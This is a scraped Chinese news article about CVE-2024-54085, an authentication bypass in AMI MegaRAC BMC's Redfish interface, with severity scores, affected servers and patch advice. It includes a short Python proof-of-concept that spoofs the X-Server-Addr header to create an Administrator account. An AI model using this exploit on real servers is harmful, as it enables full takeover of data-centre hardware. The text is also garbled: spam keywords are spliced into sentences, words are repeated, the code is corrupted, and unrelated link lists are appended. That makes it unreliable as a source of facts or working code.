您现在的位置是:系统运维 >>正文
重大漏洞警示:AMI BMC 漏洞可能导致远程认证绕过
系统运维1人已围观
简介安全研究人员近期发现,AMI的MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证。这一漏洞编号为CVE-2024-54085,已影响众多数据中心设备和服务器型号,可能危及全球 ...
安全研究人员近期发现,漏洞漏洞AMI的警示MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证 。远程这一漏洞编号为CVE-2024-54085 ,认证绕过已影响众多数据中心设备和服务器型号 ,漏洞漏洞可能危及全球多家组织的警示云基础设施安全。
该漏洞存在于AMI的远程基板管理控制器(BMC)软件的Redfish接口中,香港云服务器波及的认证绕过设备包括HPE Cray XD670和Asus RS720A-E11-RS24U服务器等 。根据安全分析 ,漏洞漏洞通过Shodan搜索 ,警示研究人员已在公共互联网上发现了大约1000个暴露在外的远程实例。

Shodan上暴露的认证绕过实例(来源:Eclypsium)
漏洞影响范围Eclypsium的研究人员指出,截至2024年8月的漏洞漏洞MegaRAC版本均受到该认证绕过漏洞的免费模板影响 。调查显示 ,警示漏洞存在于固件文件系统中的远程host-interface-support-module.lua文件中,攻击者可通过操纵HTTP标头值来绕过安全控制。
该漏洞的严重性不容小觑 ,当Redfish接口直接暴露在互联网上时 ,其CVSS评分高达10.0(CVSSv3)和10.0(CVSSv4) 。即使在Redfish访问仅限于相邻网络的环境中,高防服务器CVSS评分仍高达9.6(CVSSv3)和9.4(CVSSv4)。
成功利用该漏洞的攻击者可以完全远程控制受影响的服务器,部署恶意软件或勒索软件,篡改固件,甚至通过过压条件物理损坏硬件,或制造无限重启循环,导致受害者无法恢复,除非重新配置设备。
漏洞利用细节这一漏洞的源码下载根源在于Redfish接口中的输入验证不充分 。漏洞代码虽然检查了HTTP标头值,但可以被精心设计的请求欺骗。当用户添加X-Server-Addr标头时 ,lighttpd Web服务器会将其结构化为用户输入,后跟服务器的实际地址 ,例如 :
复制`X-Server-Addr: , ::ffff:1.2.3.4`1.漏洞代码使用正则表达式提取第一个冒号之前的所有内容,服务器租用这意味着如果攻击者发送“169.254.0.17:”作为输入 ,系统将提取“169.254.0.17”,从而匹配数据库值并绕过认证。
以下是一个简单的漏洞利用示例:
复制`import requests print( json.dumps(requests.post( https://:8443/redfish/v1/AccountService/Accounts, jsnotallow={ Name: Hax0r, Password: password, UserName: demo712, RoleId: Administrator, }, verify=False, headers={ X-Server-Addr: 169.254.0.17: } ).json(), indent=2) )`1. 修复建议AMI已向OEM制造商发布了补丁,制造商需将这些修复措施整合到客户更新中。建议各组织机构确保远程管理接口不对外暴露 ,并定期对所有服务器进行固件更新 。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“信息技术视野”。http://www.bziz.cn/html/756c499239.html
上一篇:聊聊数据匿名化技术
下一篇:软件安全知识之漏洞讨论
相关文章
2023年DDoS攻击发展趋势预测
系统运维DDoS是一种非常“古老”的网络攻击技术,随着近年来地缘政治冲突对数字经济格局的影响,DDoS攻击数量不断创下新高,其攻击的规模也越来越大。日前,安全网站Latest Hacki ...
【系统运维】
阅读更多小米5plus什么时候上市
系统运维有网友爆料称红米note2将搭载指纹识别,而且还有小米5和小米5plus将蓄势待发,那么小米5plus什么时候上市呢?下文小乐哥给大家介绍小米5plus上市时间,一起来了解下吧! 按之前 ...
【系统运维】
阅读更多揭秘手机root对用户和设备的影响(了解手机root的风险和好处,为你的设备做出明智决策)
系统运维在智能手机的世界里,root成为了一个备受争议的话题。对于一些手机爱好者和专业用户来说,root可以带来更多自定义、优化和控制的机会,但是对于大多数普通用户来说,root则可能带来一些潜在风险和不稳定 ...
【系统运维】
阅读更多
热门文章
最新文章
友情链接
- Soul如何屏蔽手机通讯录
- WPS Word转换成Excel表格的方法教程
- Excel表格按月份排序的方法
- 康达智控(探索智能控制未来,康达智控扬帆起航)
- Mac电脑如何使用U盘启动安装Windows系统(详细教程及步骤,让您轻松完成Mac电脑安装Windows系统)
- 怎么修改手机ip地址
- 如何使用苹果屏幕镜像进行安装(从零开始教你如何使用苹果屏幕镜像安装Mac系统)
- 荣耀畅玩平板LTE(高性能配置,超长续航,LTE网络支持,满足多场景需求)
- Excel表格中将竖列数据求和的方法教程
- 使用U盘制作Win10系统的教程(简单易懂的Win10系统安装指南,教你轻松搞定) 企业服务器云服务器香港物理机源码库网站建设亿华云b2b信息平台